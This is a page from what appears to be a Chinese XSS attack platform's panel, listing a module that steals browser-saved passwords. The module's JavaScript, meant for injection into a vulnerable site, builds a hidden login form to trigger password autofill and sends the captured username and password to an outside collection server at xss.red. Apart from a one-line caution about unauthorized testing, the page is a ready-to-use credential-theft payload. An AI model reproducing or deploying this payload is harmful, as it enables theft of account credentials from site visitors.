存档
那些文章
漏洞预警
圈内新闻
资源分享
设计笔记
吐槽
笔记
关于
留言
友链
计划
读者墙
标签集
面板
更新历史
提交需求
Chatgpt
XSS平台
子站搜索
会员面板
请经常阅读公告和更新日志来快速了解面板的发展情况.
未登录
未激活
面板公告
更新历史
提交需求
需求列表
Chatgpt
XSS 平台
我的模块
公共模块
辅助扩展
短号选择
子站搜索
面板密语
个人设置
消费清单
退出登录
测试之前,请妥善考虑一二,请勿胡乱搞事情,测试未授权网站有风险!
模块名称
获取浏览器记住的明文密码
模块描述
参考 余弦大牛的文章,写了个模块http://hi.baidu.com/zeracker/item/c2de19cbdfa013db964452cb type id name 为要获取的表单页面 input标签属性值,测试通过 chrome firefox 360浏览器。 只要是 同域的 都可获取! 比如 要获取的浏览器已记录的密码为webvul.com/admin.php 文件的 那么在 webvul.com/admin/user/list.php页面插入 也可以获取到!
参数
需要服务器接收的参数名
["username","password"]
配置参数
使用此模块时需要配置的参数,如参数名为user,则代码引用:{set.user}
["type1"," type2","id1","id2","name1","name2"]
代码
{projectId}为项目id,{set.***}为***配置参数
function create_body(){ document.write('<body></body>'); } function create_form(user) { /*获取明文密码*/ var f = document.createElement("form"); f.style.display= "none" document.getElementsByTagName("body")[0].appendChild(f); var e1 = document.createElement("input"); e1.type = "{set.type1}"; e1.name = "{set.name1}"; e1.id = "{set.id1}"; f.appendChild(e1); var e = document.createElement("input"); e.name = "{set.name2}"; e.type = "{set.type2}"; e.id = "{set.id2}"; f.appendChild(e); setTimeout(function () { username = document.getElementById("{set.id1}").value; password = document.getElementById("{set.id2}").value; var newimg = new Image(); newimg.src="http://xss.red/xss.php?do=api&id={projectId}&username="+username+"&password="+password; }, 2000); // 时间竞争 } create_form('');
返回